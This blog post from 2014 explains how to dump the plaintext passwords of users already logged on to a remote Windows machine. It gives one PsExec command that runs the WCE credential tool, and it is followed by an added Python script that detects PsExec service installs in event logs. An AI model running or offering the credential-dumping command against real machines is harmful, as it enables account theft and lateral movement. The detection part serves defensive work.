Tuesday, November 25, 2014

Collecting the Plaintext Password of an Already Logged-on Windows User

In a previous post, I explained how to set up a scheduled task to nab a logging-on user's password. I mentioned that you could kick a user off their session and use that technique when they log on again, but if they're already logged in, grabbing their password directly is probably easier.

To start, you'll need WCE (Windows Credentials Editor) and PsExec. Open an elevated command prompt as an account with administrative rights on the target computer (typically a domain admin). Change to the directory containing WCE and PsExec, then run this command:

psexec \\target -s -c -f wce -w

Replace "target" with the name of the remote computer that holds the user's session.

WCE's output, including the plaintext passwords of all logged-on users, shows up in your console within a second. That was easy!
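From the defender's side, the PsExec step above is noisy: PsExec works by installing a temporary service named PSEXESVC on the target, which the System event log records as event ID 7045. The following is an added detection example, not code from the original post; the space-separated key=value export format, the sample events and the "service binary in the Windows root" heuristic are my own constructions and assumptions.

```python
"""Flag PsExec-style service installs in Windows System log events.

PsExec (used in the post to push WCE to the target) runs by installing a
temporary service, PSEXESVC, on the remote host; the System log records
that as event ID 7045, "A service was installed in the system".
The events below are constructed samples, not real telemetry.
"""
import re

# Constructed sample export: one event per line, space-separated key=value.
SAMPLE_EVENTS = [
    "EventID=7045 Host=FILESRV01 ServiceName=PSEXESVC "
    "ImagePath=%SystemRoot%\\PSEXESVC.exe Account=LocalSystem",
    "EventID=7045 Host=FILESRV01 ServiceName=Spooler "
    "ImagePath=%SystemRoot%\\System32\\spoolsv.exe Account=LocalSystem",
    "EventID=7036 Host=FILESRV01 ServiceName=PSEXESVC State=running",
    "EventID=7045 Host=WKS-22 ServiceName=svc48a1 "
    "ImagePath=%SystemRoot%\\svc48a1.exe Account=LocalSystem",
]

# A service binary dropped directly into the Windows directory (not
# System32) and run as LocalSystem is the shape PsExec leaves even when
# the service is renamed. Heuristic only (assumption): tune to your baseline.
WINROOT_BINARY = re.compile(r"^(%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.I)

def parse_event(line):
    """Turn 'k=v k=v ...' into a dict (sample values contain no spaces)."""
    return dict(tok.split("=", 1) for tok in line.split())

def classify(event):
    """Name the rule a 7045 event trips, or None if it looks benign."""
    if event.get("EventID") != "7045":
        return None
    if event.get("ServiceName", "").upper() == "PSEXESVC":
        return "psexec-service-name"
    if (event.get("Account") == "LocalSystem"
            and WINROOT_BINARY.match(event.get("ImagePath", ""))):
        return "service-binary-in-windows-root"
    return None

def detect(lines):
    """Return (host, service, rule) for every event that trips a rule."""
    findings = []
    for ev in map(parse_event, lines):
        rule = classify(ev)
        if rule:
            findings.append((ev["Host"], ev["ServiceName"], rule))
    return findings
```

Pair a 7045 hit with the preceding network logon (event 4624, logon type 3) on the same host to see which admin account pushed the service; the name rule alone misses a renamed service, which is why the second heuristic exists.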
